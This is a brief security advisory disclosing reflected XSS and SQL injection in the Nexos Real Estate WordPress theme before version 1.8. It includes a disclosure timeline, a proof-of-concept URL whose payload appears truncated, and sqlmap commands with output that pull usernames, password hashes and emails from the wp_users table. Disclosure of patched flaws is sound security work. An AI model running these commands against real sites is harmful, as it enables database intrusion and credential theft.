Nexos - Real Estate < 1.8 - Unauthenticated Reflected XSS & SQL Injection

Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme», tested version — v1.7. June 17th, 2020 - Confirmed & Escalated to Envato. June 19th, 2020 - v1.8 released. Fixing the issues.

PoC

PoC Unauthenticated Reflected XSS: https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search;_location="> ### PoC SQL Injection: [!] sqlmap --url=“https://example.com/nexos-wp/side-map/?search_order=idlisting DESC” --dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [] xx_nexos [] information_schema [!] sqlmap --url=“https://example.com/nexos-wp/side-map/?search_order=idlisting DESC” -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: xx_nexos Table: wp_users [9 entries] [REDACTED]